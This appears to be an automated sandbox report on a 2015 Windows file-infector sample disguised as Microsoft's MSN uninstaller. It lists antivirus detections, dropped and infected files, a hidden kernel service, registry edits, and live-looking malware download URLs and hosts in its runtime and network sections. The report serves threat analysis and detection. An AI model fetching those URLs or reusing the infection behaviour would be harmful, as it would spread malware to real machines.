Analysis Date | 2015-08-28 11:28:44 |
---|---|
MD5 | c068de75c6d81b8dba86fec207281428 |
SHA1 | 36ec020aa19e25a133a1d5a9f63d48a81bdd0f83 |
Static Details:
File type | PE32 executable for MS Windows (GUI) Intel 80386 32-bit | |
---|---|---|
Section | .text md5: c02003b9f50c63f6a112afcee0c8057e sha1: 7a491315e9fb929b216e9d249e0b05bee0c28465 size: 16384 | |
Section | .data md5: 2395a14b242238675b3a7322d039eb97 sha1: 9221e044437a07c96ff3c8a686e1f031edf554aa size: 4096 | |
Section | .rsrc md5: baabdff38152118699c72fc17e454372 sha1: 519883dd302e18b465fe071e2fb2957501e1d7ad size: 8192 | |
Section | !55u md5: fdb2840b38dd8eef825653987335c4db sha1: 722c49e541fb103fffe3d8d6d16abd7bb377b2c1 size: 20480 | |
Section | .tc md5: e347d822422ba661f7c3e4bf8a8b7f6f sha1: 6bf1063e8583ccbf180c94472bdff061fe1558a8 size: 28672 | |
Section | W55uj md5: 141f2f096939449412ceec1c3ad435c6 sha1: 28bec8b32534178eb04fdef99b6ac80d3629e6a9 size: 20480 | |
Timestamp | 2001-07-19 19:29:57 | |
Pdb path | pdb | |
Version | LegalCopyright: Copyright (C) Microsoft Corp. 1981-2000 InternalName: MSNUNIN FileVersion: 6.10.0016.1624 CompanyName: Microsoft Corporation Built by: msnbld ProductName: Microsoft(R) MSN (R) Communications System ProductVersion: 6.10.0016.1624 FileDescription: MSN Uninstall Progman OriginalFilename: MSNUNIN.EXE | |
PEhash | 1234840ca0de89bfdc80714a9d3a95e2890a2ea7 | |
IMPhash | 2a1c59f2822a4b9e0435e5c824306502 | |
AV | Rising | Win32.Roue.a |
AV | Mcafee | W32/Kudj |
AV | Avira (antivir) | W32/Jadtre.B |
AV | Twister | Virus.558BEC81EC@120000#.mg |
AV | Ad-Aware | Win32.VJadtre.3 |
AV | Alwil (avast) | Malware-gen:Viking-CF:Win32:Malware-gen:Win32:Viking-CF |
AV | Eset (nod32) | Win32/Wapomi.BA virus |
AV | Grisoft (avg) | Win32/Wapomi.I |
AV | Symantec | W32.Wapomi.C!inf |
AV | Fortinet | W32/Nimnul.F |
AV | BitDefender | Win32.VJadtre.3 |
AV | K7 | Virus ( 0040f7441 ) |
AV | Microsoft Security Essentials | Virus:Win32/Mikcer.B |
AV | MicroWorld (escan) | Win32.VJadtre.3 |
AV | MalwareBytes | no_virus |
AV | Authentium | W32/PatchLoad.E |
AV | Frisk (f-prot) | W32/PatchLoad.E |
AV | Ikarus | Trojan-Downloader.Win32.Small |
AV | Emsisoft | Win32.VJadtre.3 |
AV | Zillya! | Virus.Nimnul.Win32.5 |
AV | Kaspersky | Virus.Win32.Nimnul.f |
AV | Trend Micro | PE_WAPOMI.BM |
AV | CAT (quickheal) | W32.Nimnul.F1 |
AV | VirusBlokAda (vba32) | Virus.Nimnul.19209 |
AV | Padvish | no_virus |
AV | BullGuard | Win32.VJadtre.3 |
AV | Arcabit (arcavir) | Win32.VJadtre.3 |
AV | ClamAV | Win.Trojan.Downloader-64296 |
AV | Dr. Web | BackDoor.Darkshell.246 |
AV | F-Secure | Win32.VJadtre.3 |
AV | CA (E-Trust Ino) | Win32/Nimnul.A |
Runtime Details:
Process
↳ C:\malware.exe
Creates File | C:\Documents and Settings\Administrator\Local Settings\Temp\flYtceO.exe |
---|---|
Creates File | C:\Documents and Settings\Administrator\Local Settings\Temp\vqjSfS.exe |
Creates File | C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe |
Creates Process | C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe |
Creates Process | C:\Documents and Settings\Administrator\Local Settings\Temp\vqjSfS.exe |
Creates Process | C:\Documents and Settings\Administrator\Local Settings\Temp\flYtceO.exe |
Process
↳ C:\Program Files\Internet Explorer\iexplore.exe http://nbtj.114anhui.com/msn/163.htm?2
Registry | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CabinetState\Settings ➝ NULL |
---|---|
Registry | HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL |
Registry | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}\iexplore\Type ➝ 3 |
Registry | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{E2E2DD38-D088-4134-82B7-F2BA38496583}\iexplore\Type ➝ 4 |
Registry | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1 |
Registry | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{FB5F1910-F110-11D2-BB9E-00C04F795683}\iexplore\Type ➝ 4 |
Registry | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\Locked ➝ 1 |
Creates File | C:\Documents and Settings\NetworkService\Favorites\desktop.ini |
Creates File | C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\index.dat |
Creates File | C:\Documents and Settings\NetworkService\Cookies\index.dat |
Creates File | \Device\Afd\AsyncConnectHlp |
Creates File | C:\Documents and Settings\NetworkService\Local Settings\History\History.IE5\index.dat |
Creates File | C:\Documents and Settings\NetworkService\Favorites\Desktop.ini |
Creates File | PIPE\lsarpc |
Creates File | \Device\Afd\Endpoint |
Creates Mutex | Shell.CMruPidlList |
Winsock DNS | nbtj.114anhui.com |
Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat"
Creates File | C:\WINDOWS\system32\dllcache\lsasvc.dll |
---|---|
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe |
Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\vqjSfS.exe
Registry | HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL |
---|---|
Registry | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1 |
Creates File | C:\Program Files\Adobe\Acrobat 7.0\Reader\AdobeUpdateManager.exe |
Creates File | C:\Program Files\MSN\MSNCoreFiles\Install\msnsusii.exe |
Creates File | C:\Program Files\MSN\MSNCoreFiles\Install\MSN9Components\Digcore.exe |
Creates File | C:\Program Files\Adobe\Acrobat 7.0\Reader\Updater\acroaum.exe |
Creates File | C:\temp\files\vqjSfS.exe |
Creates File | C:\Program Files\Adobe\Acrobat 7.0\Setup Files\RdrBig709\ENU\setup.exe |
Creates File | C:\temp\files\malware.exe |
Creates File | C:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32.exe |
Creates File | C:\Program Files\Adobe\Acrobat 7.0\Setup Files\RdrBig709\ENU\instmsiw.exe |
Creates File | PIPE\lsarpc |
Creates File | \Device\Afd\Endpoint |
Creates File | C:\Program Files\MSN\MSNCoreFiles\Install\MSN9Components\Msncli.exe |
Creates File | C:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32Info.exe |
Winsock DNS | ddos.dnsnb8.net |
Winsock URL | http://ddos.dnsnb8.net:799/cj//k1.rar |
Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe
Creates File | PIPE\SfcApi |
---|---|
Creates File | PIPE\wkssvc |
Creates File | C:\WINDOWS\system32\qmgr.dll |
Creates File | C:\WINDOWS\system32\mspmsnsv.dll |
Creates File | C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat |
Creates Process | "C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat" |
Starts Service | WmdmPmSN |
Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\flYtceO.exe
Registry | HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL |
---|---|
Registry | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1 |
Creates File | C:\temp\files\AcroRd32.exe |
Creates File | C:\temp\files\AcroRd32Info.exe |
Creates File | C:\Program Files\MSN\MSNCoreFiles\Install\MSN9Components\Digcore.exe |
Creates File | C:\temp\files\setup.exe |
Creates File | C:\Program Files\Adobe\Acrobat 7.0\Setup Files\RdrBig709\ENU\setup.exe |
Creates File | C:\temp\files\instmsiw.exe |
Creates File | C:\temp\files\malware.exe |
Creates File | C:\Program Files\Adobe\Acrobat 7.0\Setup Files\RdrBig709\ENU\instmsiw.exe |
Creates File | C:\temp\files\reader_sl.exe |
Creates File | PIPE\lsarpc |
Creates File | C:\temp\files\Digcore.exe |
Creates File | \Device\Afd\Endpoint |
Creates File | C:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32Info.exe |
Creates File | C:\temp\files\msnsusii.exe |
Creates File | C:\temp\files\AdobeUpdateManager.exe |
Creates File | C:\Program Files\Adobe\Acrobat 7.0\Reader\AdobeUpdateManager.exe |
Creates File | C:\temp\files\flYtceO.exe |
Creates File | C:\Program Files\MSN\MSNCoreFiles\Install\msnsusii.exe |
Creates File | C:\Program Files\Adobe\Acrobat 7.0\Reader\Updater\acroaum.exe |
Creates File | C:\temp\files\vqjSfS.exe |
Creates File | C:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32.exe |
Creates File | C:\temp\files\monitor.exe |
Creates File | C:\Program Files\MSN\MSNCoreFiles\Install\MSN9Components\Msncli.exe |
Creates File | C:\temp\files\Msncli.exe |
Creates File | C:\temp\files\acroaum.exe |
Winsock DNS | ddos.dnsnb8.net |
Winsock URL | http://ddos.dnsnb8.net:799/cj//k1.rar |
Process
↳ C:\WINDOWS\system32\svchost.exe
Creates File | PIPE\lsarpc |
---|---|
Creates File | \Device\Afd\Endpoint |
Process
↳ Pid 812
Process
↳ Pid 860
Process
↳ C:\WINDOWS\System32\svchost.exe
Registry | HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL |
---|---|
Registry | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WmdmPmSN\Start ➝ 2 |
Registry | HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM\List of event-active namespaces ➝ NULL |
Registry | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1 |
Creates File | C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\G56V8XAH\desktop.ini |
Creates File | C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\ODE345I7\desktop.ini |
Creates File | NtHid |
Creates File | C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\index.dat |
Creates File | C:\WINDOWS\system32\WBEM\Repository\$WinMgmt.CFG |
Creates File | C:\Documents and Settings\NetworkService\Cookies\index.dat |
Creates File | \Device\Afd\AsyncConnectHlp |
Creates File | C:\Documents and Settings\NetworkService\Local Settings\History\History.IE5\index.dat |
Creates File | C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\YSKU8U0B\desktop.ini |
Creates File | \Device\Afd\Endpoint |
Creates File | C:\WINDOWS\TEMP\NtHid.sys |
Creates File | C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\9WG0YPJS\desktop.ini |
Creates File | C:\WINDOWS\system32\WBEM\Logs\wbemess.log |
Deletes File | C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini |
Deletes File | C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini |
Deletes File | C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini |
Deletes File | C:\WINDOWS\TEMP\NtHid.sys |
Deletes File | C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini |
Creates Process | C:\Program Files\Internet Explorer\iexplore.exe http://nbtj.114anhui.com/msn/163.htm?2 |
Creates Mutex | c:!documents and settings!networkservice!local settings!history!history.ie5! |
Creates Mutex | c:!documents and settings!networkservice!cookies! |
Creates Mutex | c:!documents and settings!networkservice!local settings!temporary internet files!content.ie5! |
Creates Service | NtHid - C:\WINDOWS\TEMP\NtHid.sys |
Winsock DNS | 141.8.226.14 |
Winsock DNS | www.490a-B8B5-9B8C1E870B0C.com |
Winsock DNS | www.baidu.com |
Winsock DNS | pc1.114central.com |
Winsock URL | http://141.8.226.14/ko/03.exe |
Winsock URL | http://141.8.226.14/ko/02.exe |
Process
↳ Pid 1216
Process
↳ C:\WINDOWS\system32\spoolsv.exe
Process
↳ Pid 1872
Process
↳ Pid 1160
Network Details:
DNS | nbtj.114anhui.com Type: A 193.166.255.171 |
---|---|
DNS | www.a.shifen.com Type: A 103.235.46.39 |
DNS | pc1.114central.com Type: A 141.8.226.14 |
DNS | ddos.dnsnb8.net Type: A |
DNS | www.baidu.com Type: A |
DNS | www.490a-B8B5-9B8C1E870B0C.com Type: A |
HTTP GET | http://141.8.226.14/ko/01.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) |
HTTP GET | http://nbtj.114anhui.com/msn/163.htm?2 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) |
HTTP GET | http://141.8.226.14/ko/02.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) |
HTTP GET | http://141.8.226.14/ko/03.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) |
Flows TCP | 192.168.1.1:1037 ➝ 141.8.226.14:80 |
Flows TCP | 192.168.1.1:1039 ➝ 193.166.255.171:80 |
Flows TCP | 192.168.1.1:1040 ➝ 141.8.226.14:80 |
Flows TCP | 192.168.1.1:1041 ➝ 141.8.226.14:80 |
Raw Pcap
Strings